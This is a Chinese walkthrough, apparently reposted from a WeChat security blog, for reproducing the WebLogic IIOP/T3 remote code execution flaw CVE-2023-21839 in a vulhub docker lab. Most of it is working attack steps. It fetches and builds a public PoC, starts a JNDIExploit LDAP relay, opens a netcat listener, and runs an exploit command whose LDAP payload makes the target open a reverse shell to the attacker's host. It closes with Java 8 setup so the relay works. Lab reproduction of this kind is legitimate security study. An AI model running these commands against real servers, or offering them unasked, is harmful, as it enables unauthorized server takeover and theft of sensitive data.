漏洞概述
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
环境搭建
contos7 (我的环境在)
进入环境
启动容器
docker-compose up -d//启动容器(绿色done代表启动成功)
docker-compose ps -a//查看状态
浏览访问
靶机ip+分配端口/console
输入后等一会
地址:http://192.168.10.30:7001/console
漏洞复现
poc地址:https://github.com/4ra1n/CVE-2023-21839
下载完,拖kali里面,解压
unzip CVE-2023-21839-master.zip
kali里面安装go环境
apt install gccgo-go
apt install golang-go
进入poc环境
编译
go build -o CVE-2023-21839
编译后
攻击命令
(-ip和-port为靶机的IP和端口,-ldap里的IP都为攻击IP,前面的端口号是中转工具的默认端口,后面为导出的端口号)
./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892
中转工具
JNDIExploit v1.4地址:
https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4
下载拖进kali里,解压
攻击
(-i为攻击机IP)
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx
开启中专工具监听
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.10.55
kali再开一个窗口开启监听
nc -lvnp 7892
kali再开一个窗口攻击
./CVE-2023-21839 -ip 192.168.10.30 -port 7001 -ldap ldap://192.168.10.55:1389/Basic/ReverseShell/192.168.10.55/7892
反弹shell
后谈
如果反弹不了,可能是java版本过高需要在java1.8的环境上运行
卸载原有java版本
apt-get remove openjdk*
apt autoremove
下载安装java1.8
下载链接:
https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
下载之后拖进kali里
tar -xzvf jdk-8u202-linux-x64.tar.gz//解压
mv jdk1.8.0_202 /opt//移动
进入对应路径
依次执行
export JAVA_HOME=/opt/jdk1.8.0_202
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1
update-alternatives --set java /opt/jdk1.8.0_202/bin/java
update-alternatives --set javac /opt/jdk1.8.0_202/bin/javac
java -version//完成查看版本
原文始发于微信公众号(小白摸坑学网安):CVE-2023-21839 【vulhub weblogic 漏洞复现】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论